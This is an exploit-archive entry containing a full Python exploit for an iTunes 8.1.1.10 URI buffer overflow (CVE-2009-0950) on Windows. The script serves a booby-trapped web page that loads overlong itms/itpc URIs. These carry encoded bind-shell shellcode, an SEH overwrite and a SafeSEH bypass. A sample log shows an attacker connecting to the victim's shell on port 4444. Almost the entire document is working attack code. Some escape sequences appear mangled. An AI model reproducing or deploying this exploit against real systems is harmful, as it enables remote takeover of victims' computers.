Apple iTunes 8.1.1.10 (itms/itcp) Remote Buffer Overflow Exploit (win) 's

#!/usr/bin/python
# Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploit
# www.offensive-security.com/blog/vulndev/itunes-exploitation-case-study/
# Matteo Memelli | ryujin __A-T__ offensive-security.com
# Spaghetti & Pwnsauce – 06/10/2009
# CVE-2009-0950 http://dvlabs.tippingpoint.com/advisory/TPTI-09-03
#

# Vulnerability can’t be exploited simply overwriting a return address on the
# stack because of stack canary protection. Increasing buffer size leads to
# SEH overwrite but it seems that the Access Violation needed to get our own
# Exception Handler called is not always thrown.
# So, to increase reliability, the exploit sends two URI to iTunes:
# – the 1st payload corrupts the stack (it doesnt overwrite cookie, no crash)
# – the 2nd payload fully overwrite SEH to 0wN EIP
# Payloads must be encoded in order to obtain pure ASCII printable shellcode.
# I could trigger the vulnerability from Firefox but not from IE that seems
# to truncate the long URI.
# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10,
# iTunes 8.1.1.10, 8.1.0.52
#
# –> hola hola ziplock, my Apple Guru! && cheers to muts… he knows why
#
# ryujin:Desktop ryujin$ ./ipwn.py
# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950
# [+] Matteo Memelli aka ryujin __A-T__ offensive-security.com
# [+] www.offensive-security.com
# [+] Spaghetti & Pwnsauce
# [+] Listening on port 80
# [+] Connection accepted from: 172.16.30.7
# [+] Payload sent, wait 20 secs for iTunes error!
# ryujin:Desktop ryujin$ nc -v 172.16.30.7 4444
# Connection to 172.16.30.7 4444 port [tcp/krb524] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:/Program Files/Mozilla Firefox>

from socket import *  html = """ <html>   <head><title>iTunes loading . . .</title>   <script>    function openiTunes(){document.location.assign("itms://itunes.apple.com/");}    function prepareStack(){document.location.assign("%s");}    function ownSeh(){document.location.assign("%s");}    function ipwn(){     prepareStack();     ownSeh();    }    function main() {     openiTunes();     // Increase this timeout if your iTunes takes more time to load!     setTimeout('ipwn()',20000);    }   </script>   </head>   <body onload="main();">     <p align="center">     <b>iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950</b>     </p>     <p align="center"><b>ryujin __ A-T __ offensive-security.com</b></p>     <p align="center"><b>www.offensive-security.com</b></p>     <p align="center">     iTunes starting... wait for 20 secs; if you get an error, click "Ok"     in the MessageBox before checking for your shell on port 4444 :)<br/>     If victim host is not connected to the internet, exploit will fail     unless iTunes is already opened and you disable "openiTunes" javascript     function.     <br/>     <h2 align="center">     <b><u>This exploit works if opened from Firefox not from IE!</u></b>     </h2>     <p align="center">     After exploitation iTunes crashes, you need to kill it from TaskManager     <br/>have fun!</br>     </p>     </p>   </body> </html>"""  # Alpha2 ASCII  printable  Shellcode  730 Bytes, via  EDX (0x60,0x40 Badchar) # This is not standard Alpha2 bind shell. Beginning of shellcode  is modified # in order to obtain register alignment and to  reset ESP and EBP we  mangled # before. Rest of decoded shellcode is Metasploit  bind  shell  on  port 4444 # EXITFUNC=thread # shellcode = ("VVVVVVVVVVVVVVVVV7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOqhDahIoS0"              "5QnaJLS1uQVaeQcdcm2ePESuW5susuPEsuilazJKRmixHykOkOKOCPLKPlUtu"              "tnkRegLLKSLfepx31zOlK2o7hlKqOEpWqZK3ylKwDLKeQHndqo0j9llOt9P3D"              "uW9Q8J4MWqkrJKkDukPTWTq845M5LKQOq4VajKcVLKTLPKlKQOUL6ajK336LL"              "KMY0lWTwle1O3TqiK2DLKaSFPLKQPVllK0p7lLmlK3pUXQNU8LNbnvnjL0PkO"              "8V2Fv3U61xds02U8RWpsVRqO649on0PhjkZMYlekpPKOKfsoMYkUpfna8mgxV"              "b65RJuRIoHPPhHYFiL5lmBwkOzvpSPSV3F3bsg3BsSsScIohPsVRHR1sl2Fcc"              "k9M1nuphOT6zppIWrwKO8VcZ6ppQv5KO8PBHmtNMvNm9QGKON6aCqEkOZpbHZ"              "EbiNfRiSgioiFRpf40TseiohPLSu8KWD9kvPyf7YoxVqEKOxPu6sZpd3VSX1s"              "0mK98ecZRpv9Q9ZlMYkWqzpDmYxbTqO0KCoZKNaRVMkN3r6LJ3NmpzFXNKNKL"              "ksX0rkNls5FkOrURdioXVSk67PRPQsapQCZgqbq0QSesaKOxPaxNMZyEUjnCc"              "KOn6qzKOkOtwKOJpNk67YlMSKtcTyozvrryozp0hXoZnYp1p0SkOXVKOHPA") # Padding pad0x1          = "/x41"*425  # Make EDX pointing to shellcode and "pray" sh3llcod3 [email protected] w00t w00t align           = "/x61"*45 + "/x54/x5A" + "/x42"*6 + "V"*10  # Padding pad0x2          = "/x41"*570                                     # ASCII friendly RET overwriting SEH: bye bye canary, tweet tweet # 0x67215e2a QuickTime.qts ADD ESP,8;RETN (SafeSEH bypass) ret             = "/x2a/x5e/x21/x67"  # Let the dance begin... Point EBP to encoded jmp align_for_jmp   = "/x61/x45/x45/x45" + ret + "/x44" + "/x45"*7  # Decode a NEAR JMP and JUMP BACK BABY! jmp_back        = ("UYCCCCCCIIIIIIIIII7QZjAXP0A0AkA"                    "AQ2AB2BB0BBABXP8ABuJIZIE5jZKOKOA") # Padding pad0x3          = "/x43"*162                                     # We send 2 payloads to iTunes: first is itms and second itpc # url1 smashes the stack in order to get an AV later url1            = "itms://:" + "/x41"*200 + "/" url2            = "itpc://:" + pad0x1 + align + shellcode +pad0x2 +/                                align_for_jmp + jmp_back + pad0x3 payload         = html % (url1, url2)  print "[+] iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950" print "[+] Matteo Memelli aka ryujin __A-T__ offensive-security.com" print "[+] www.offensive-security.com" print "[+] Spaghetti & Pwnsauce" s = socket(AF_INET, SOCK_STREAM) s.bind(("0.0.0.0", 80)) s.listen(1) print "[+] Listening on port 80" c, addr = s.accept() print "[+] Connection accepted from: %s" % (addr[0]) c.recv(1024) c.send(payload) print "[+] Payload sent, wait 20 secs for iTunes error!" c.close() s.close()

# milw0rm.com [2009-06-12]